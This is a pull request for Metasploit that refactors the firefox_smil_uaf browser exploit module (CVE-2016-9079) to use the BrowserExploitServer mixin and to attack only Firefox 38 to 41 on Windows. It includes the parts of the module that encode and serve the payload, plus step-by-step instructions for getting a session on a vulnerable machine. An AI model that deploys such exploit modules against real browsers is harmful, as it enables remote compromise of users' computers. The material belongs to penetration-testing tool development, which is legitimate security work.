### PR TITLE
Update firefox_smil_uaf to use BrowserExploitServer

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -250,7 +250,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.8)
+    rex-exploitation (0.1.10)
       jsobfu
       metasm
       rex-arch

--- a/modules/exploits/windows/browser/firefox_smil_uaf.rb
+++ b/modules/exploits/windows/browser/firefox_smil_uaf.rb
@@ -8,7 +8,7 @@ require 'msf/core'
   class MetasploitModule < Msf::Exploit::Remote
     Rank = NormalRanking
 
-    include Msf::Exploit::Remote::HttpServer
+    include Msf::Exploit::Remote::BrowserExploitServer
 
     def initialize(info={})
       super(update_info(info,
@@ -25,9 +25,17 @@ require 'msf/core'
             'William Webb <william_webb[at]rapid7.com>'         # Metasploit module
           ],
           'Platform'       => 'win',
+          'BrowserRequirements' =>
+            {
+              source:  /script/i,
+              os_name: OperatingSystems::Match::WINDOWS,
+              ua_name: HttpClients::FF,
+              # Fixed in Firefox 50.0.2
+              ua_ver: lambda { |ver| ver.to_i.between?(38, 41) }
+            },
           'Targets'        =>
           [
-            [ 'Mozilla Firefox',
+            [ 'Mozilla Firefox 38 to 41',
               {
                 'Platform' => 'win',
                 'Arch'     => ARCH_X86,
@@ -40,11 +48,11 @@ require 'msf/core'
             'InitialAutoRunScript' => 'migrate -f'
           },
           'References'     =>
-          [
-            [ 'CVE', '2016-9079' ],
-            [ 'Bugzilla', '1321066' ]
-          ],
-          'Arch'           => ARCH_X86,
+            [
+              [ 'CVE', '2016-9079' ],
+              [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1321066' ],
+              [ 'URL', 'https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/' ]
+            ],
           'DisclosureDate' => "Nov 30 2016",
           'DefaultTarget'  => 0
         )
@@ -60,7 +68,7 @@ require 'msf/core'
     p = payload.encoded
     arch = Rex::Arch.endian(target.arch)
     payload_final = Rex::Text.to_unescape(p, arch, prefix='\\u')
-    base_uri = "#{get_resource.chomp('/')}"
+    base_uri = get_module_resource
 
     # stuff that gets adjusted alot during testing
 
@@ -248,28 +256,16 @@ require 'msf/core'
     send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
   end
 
-  def is_ff_on_windows(user_agent)
-    target_hash = fingerprint_user_agent(user_agent)
-    if target_hash[:ua_name] !~ /Firefox/ or target_hash[:os_name] !~ /Windows/
-      return false
-    end
-      return true
-  end
-
-  def on_request_uri(cli, request)
+  def on_request_exploit(cli, request, browser_info)
     print_status("Got request: #{request.uri}")
     print_status("From: #{request.headers['User-Agent']}")
-    if (!is_ff_on_windows(request.headers['User-Agent']))
-      print_error("Unsupported user agent: #{request.headers['User-Agent']}")
-      send_not_found(cli)
-      close_client(cli)
-      return
-    end
+
     if request.uri =~ /worker\.js/
       print_status("Sending worker thread Javascript ...")
       worker_js(cli)
       return
     end
+
     if request.uri =~ /index\.html/ or request.uri =~ /\//
 
       print_status("Sending exploit HTML ...")


### PR DESCRIPTION
## Description

This updates the firefox_smil_uaf module to use the BrowserExploitServer mixin. Using this mixin allows the exploit to specify which versions of FF it should attack.

Since this exploit was only tested against versions from 38 to 41, this exploit will only target those. Other versions will bail.

## Verification

Against a vulnerable FF:

- [x] Set up a Windows box, and install Firefox 38.
- [x] Start msfconsole
- [x] ```use exploit/windows/browser/firefox_smil_uaf```
- [x] Configure the appropriate settings such as SRVHOST, PAYLOAD, LHOST, etc.
- [x] ```exploit```
- [x] Point the vulnerable box to the malicious URL
- [x] The module should attempt to exploit, and ideally obtain a session

Against a non-vulnerable FF:

- [x] Download a non-vulnerable version of FF, such as version 50
- [x] Repeat the msfconsole steps above
- [x] The module should say ```Exploit requirement(s) not met: ua_ver```